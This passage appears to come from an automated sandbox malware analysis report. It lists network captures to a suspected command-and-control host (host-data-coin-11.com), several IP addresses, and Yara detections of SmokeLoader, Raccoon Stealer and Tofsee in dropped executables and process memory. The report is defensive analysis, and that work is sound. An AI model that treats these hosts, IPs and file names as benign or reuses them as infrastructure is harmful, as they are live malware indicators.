request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 49 eb ab 85 70 bc 57 dd 40 d7 fe 26 83 22 eb c3 93 58 28 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9IpW@&"X(c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 99 d6 08 56 3d 41 be f5 dc fc fb 49 f5 53 d2 30 f9 53 47 91 0d 0a 30 0d 0a 0d 0a Data Ascii: 27I:82OV=AIS0SG0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 33 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 00 53 87 1d f0 f3 66 e6 23 59 1b f2 fc c4 4a 0d 0a 30 0d 0a 0d 0a Data Ascii: 33I:82OTevSf#YJ0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 4f 0a ad 24 c4 d0 66 b1 78 06 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OTevO$fxP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 33 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 42 06 8e 51 de c4 66 e6 23 59 1b f2 fc c4 4a 0d 0a 30 0d 0a 0d 0a Data Ascii: 33I:82OTevBQf#YJ0
                      Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 14 Jan 2022 19:30:24 GMT Content-Type: application/octet-stream Content-Length: 2828315 Connection: keep-alive Last-Modified: Fri, 07 Jan 2022 23:09:57 GMT ETag: "61d8c845-2b281b" Accept-Ranges: bytes
                      Source: unknown TCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknown TCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknown HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://pieilmtu.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 280 Host: host-data-coin-11.com
                      Source: unknown HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.4:49789 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49807 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.4:49874 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49876 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49890 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49937 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49941 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49945 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Yara detected SmokeLoader
                      Source: Yara match File source: 1.1.ECD2MpEBSf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 1.0.ECD2MpEBSf.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 1.2.ECD2MpEBSf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 1.0.ECD2MpEBSf.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 9.2.jgdhbua.6f15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 1.0.ECD2MpEBSf.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 11.1.jgdhbua.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.ECD2MpEBSf.exe.5715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 11.2.jgdhbua.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000001.00000002.721727855.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000000.708255964.00000000044C1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000B.00000002.776599972.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000002C.00000002.899701090.0000000002070000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000001.00000002.721690876.0000000000680000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000002C.00000002.901276330.0000000002431000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000B.00000002.776791205.00000000020A1000.00000004.00020000.sdmp, type: MEMORY
                      Source: BB8A.exe, 0000000C.00000000.765918722.00000000006AA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      Yara detected Raccoon Stealer
                      Source: Yara match File source: 00000027.00000003.861803378.0000000004EC0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000002F.00000003.920806858.0000000004E40000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 0000002F.00000002.922842020.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000002F.00000002.1015911464.0000000004DA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000027.00000002.1024642477.0000000000400000.00000040.00020000.sdmp, type: MEMORY

                      Spam, unwanted Advertisements and Ransom Demands:

                      Yara detected Tofsee
                      Source: Yara match File source: 17.3.D936.exe.22d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 32.2.krmdinzg.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 35.2.svchost.exe.e70000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 17.2.D936.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 35.2.svchost.exe.e70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 32.2.krmdinzg.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 32.3.krmdinzg.exe.7c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 32.2.krmdinzg.exe.7c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 17.2.D936.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 32.2.krmdinzg.exe.6c0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 17.2.D936.exe.22b0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 32.2.krmdinzg.exe.7c0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000020.00000002.800983655.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000020.00000003.798724710.00000000007C0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000011.00000002.796450954.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000023.00000002.1024071704.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000020.00000002.800731759.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000011.00000002.797091655.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000011.00000003.779473426.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000020.00000002.801019606.00000000007C0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: D936.exe PID: 7124, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: krmdinzg.exe PID: 6888, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: svchost.exe PID: 3000, type: MEMORYSTR

                      System Summary:

                      PE file has nameless sections
                      Source: E3A9.exe.5.dr Static PE information: section name:
                      Source: 9889.exe.5.dr Static PE information: section name:
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6816 -ip 6816
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_0042B190
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_0042A3B0
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_00424D20
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_005731FF
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 0_2_00573253
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_2_00402A5F
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_2_00402AB3
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_1_00402A5F
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeCode function: 1_1_00402AB3
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 9_2_006F3253
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 9_2_006F31FF
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 11_2_00402A5F
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaCode function: 11_2_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_004027CA
